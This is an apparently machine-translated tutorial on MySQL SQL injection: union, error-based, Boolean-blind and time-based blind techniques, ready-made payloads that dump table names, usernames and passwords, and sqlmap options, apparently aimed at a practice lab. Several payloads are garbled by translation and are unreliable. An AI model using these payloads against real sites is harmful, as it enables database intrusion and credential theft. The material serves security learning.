A summary of the first-order SQL injection

0x00 Preface

SQL injection constructs the statement through user input to achieve the purpose. A word, do not believe any user input content, do a good job of protection.

0x01 method of transfer of parameters

The method of transmitting parameters is usually submitted by get, or post, the former has the advantage of high efficiency, the latter is good security and long parameter length. In SQL injection attacks, it is common to choose where the user is entering content. In addition, there are SQL injections in the HTTP header, such as Referer,cookie and so on. So the idea must be open, the content of the input database is likely to be a breach.

0x02 Common MySQL Statements

The following are the frequently guessed statements in the injection process:

(1) SELECT column name from table name WHERE condition #从表中选取数据

Exp:select Username,password from users where id=input

(2) UPDATE table name SET column name = new value WHERE Other column name = value #修改表中某值

Exp:update users set password= ' Inputpass ' where username= ' Inputuser '

(3) Insert into table name values (value 1, value 2, ...) #向表格中插入新的行, where values inserted in value can be the result of a logical operation

Exp:insert into users values (' + ', ' name ', ' Pass ')

Here's how to inject common operations:

(1) Comment: #, –+,//
(2) Union query: The union operator is used to combine the result set of two or more SELECT statements.
(3) The ORDER BY statement is used to sort the result set, which is used to test the number of columns in the attack.
(4) Group_concat () calculates which rows belong to the same group and displays the columns that belong to the same group. The primary purpose of the attack is to display the field at the same time.
(5) count () counts the number of ancestors.
(6) Rand () is used to generate a random number of 0~1.
(7) floor () is rounded down.
(8) Group by groups the results according to the rules we want (the rules are sorted).
(9) outfile Select from ... into outfile ' target file ' exports the contents of the table to a text file.
DumpFile Select from ... limit 0,1 where ... into dumpfile ' target file ' to export one line to a file, so add limit.
(one) load_file select Load_file (' target file ') is loaded into the above file.
Length () returns string lengths.
SUBSTR () intercepts the string substr (string, position, length) substr (Database (), 1, 1).
ASCII () returns the ASCII code of the character #通过 >,<,= the ASCII of the character to narrow the range to determine the character.
() Sleep (n) program hangs n seconds. Used for time blinds.
if (A,B,C) is the same as A?b:c

0X03 the construction of SQL injection statements

(1) SELECT column name from table name WHERE condition

Select Username,password from Users where id=input
Select Username,password from users where id= ' input '
Select Username,password from users where id= "input"
Select Username,password from Users where id= (' input ')

Take the second as an example:
I. Injection of joint queries

1)
Test the guessing statement, try entering: ' "')/\ Test for error
2)
Test: 1′or ' 1 ' = ' 1
Insert statement after become:

Select Username,password from users where id= ' 1′or ' 1 ' = ' 1′

Complete closure, statement can be executed correctly
Or use an annotation to make it close
Test:

1′or 1=1#
1′or 1=1–+

3)
The ORDER BY statement tests the number of columns

1 ' ORDER by 3#
Select Username,password from the users where id= ' 1 ' ORDER by 3# '

Successful, it proves that the statement has no errors and that there are at least 3 columns
Continue testing: 1 ' ORDER by 4#, found an error, proving that the table coexists in 3 columns.
4)
Union Select Union Query

1 ' UNION SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where table_schema= ' security ' –+

Concat () burst all table names
5)
User name, password

1 ' Union Select 1,group_concat (Username,password), 3 from users–+
#也可以在1, replace any other command at 2, 3

II. Error-based injection
1)
Guess the injected statement, no longer repeat.
2)
Statement test, when using the 1 ' Union Selcet 1,2,3–+ Return or normal page, so we want to use the error message
3)
1′and (select 1 from (select count (), concat (' ~ ', ' ~ ', Database (), ' ~ ', ' ~ ', Floor (rand () 2)) name from Information_ Schema.tables GROUP by name) b) –+
Meaning: Named concat (' ~ ', ' ~ ', Database (), ' ~ ', ' ~ ', Floor (rand () 2)) is the number of Name,count () name, this time will be an error, thus burst the value of database (), ' ~ ' is used for easy identification.
The entire statement analysis:
Overall equivalent to select 1 from B;
where B = select count (), concat (' ~ ', ' ~ ', Database (), ' ~ ', ' ~ ', Floor (rand () 2)) name from Information_schema.tables GROUP BY Name, count () number of name;
Name=concat (' ~ ', ' ~ ', Database (), ' ~ ', ' ~ ', Floor (rand () 2))

Iii. Boolean Blinds
1)
When there are only two cases of entering any statement page, that is, when there is only the correct page and error page, and no error message is displayed, then we need to make a Boolean blind. The character is determined by guessing the ASCII code of the target string character, but the process is cumbersome and the automation tool more convenient.
2)
Statement constructs:

1 ' and (ASCII (substr (), >100–+))

Returns the correct page description The range is correct, the error page returned is equivalent to the incorrect range, and is determined by an equal sign.

Iv. Time-based blinds
1)
In this case, all statements under the page only have the correct one, so that the time-based blind, the principle is to execute the sleep () function correctly, so that the program hangs, so that we can know the statement is correct or wrong. Sleep (5) is generally used to suspend the program for 5 seconds.
2)
Statement constructs:

1′and (Select if (ASCII (Database (), substr) >100,sleep (5), NULL)) –+

(2) UPDATE table name SET column name = new value WHERE Other column name = value #修改表中某值

Exp:update users set password= ' Inputpass ' where username= ' Inputuser '

Error-based SQL injection
Statement constructs:

Uname=admin&passwd= ' and (select 1 from (SELECT COUNT (*), (concat ("~", Database (), "~", Floor (rand ()))) the name from Information_schema.tables GROUP by name) b) #&submit=submit

(3) Insert into table name values (value 1, value 2, ...) #向表格中插入新的行, where values inserted in value can be the result of a logical operation.
Here we must be open-minded and aware of the breadth of the injection point.
For example User-agent,http Referer, there may be injection points.
Error-based SQL injection
Statement constructs:

1′, (select 1 from (SELECT COUNT (*), (concat ("~", (select table_name from information_schema.tables where table_schema= Database () limit 0,1), "~", Floor (rand () *))) (name from Information_schema.tables Group by name) b)

0x04 a commonly used error-based statement

1. (Select 1 from (SELECT COUNT (*), (concat ("~", (select table_name from information_schema.tables where table_schema= Database () limit 0,1), "~", Floor (rand ()))) (name from Information_schema.tables Group by name) b)/* Explode the databases */
2. (select 1 from (SELECT COUNT (*), (concat ("~", Current_User, "~", Floor (rand ()))) name from Information_schema.tables Group BY name B)/* Explode current username */
3. (select 1 from (SELECT COUNT (*), (concat ("~", (select username from the users limit 0,1), "~", Floor (rand ())) name from infor Mation_schema.tables GROUP BY name B)/* Explode all user names */

Common system functions and variables in MySQL are included:

User () Username;
Session_user () The user name of the connection database;
Database () name;
Version () MySQL database versions;
@ @datadir database path;
Current_User Current user name;
@ @hostname host name;
@ @port Database port;
@ @version_compile_os operating system;
Basedir MySQL Installation path

0x05 Sqlmap Use

Sqlmap is essential as a powerful injection tool, it can perform post injection (–data), Cookie Injection (–cookie), custom injection level (–leval), Custom injection parameters (-p), custom delay Time (–delay), Execute custom Python code (–EVAL), inject payload (–prefix; –suffix)

0X06 Summary

The essence of SQL injection is to learn to find the injection point in any location and construct the statement so that SQL commands can be executed to achieve the purpose of the attack. To learn the use of automation tools such as SQLMAP, this can greatly improve efficiency, but at the same time, it is necessary to learn to manually inject, so as to truly understand the nature of SQL injection. Finally, ask the big boys do not spray, but also ask the teachers to teach more.

A summary of the first-order SQL injection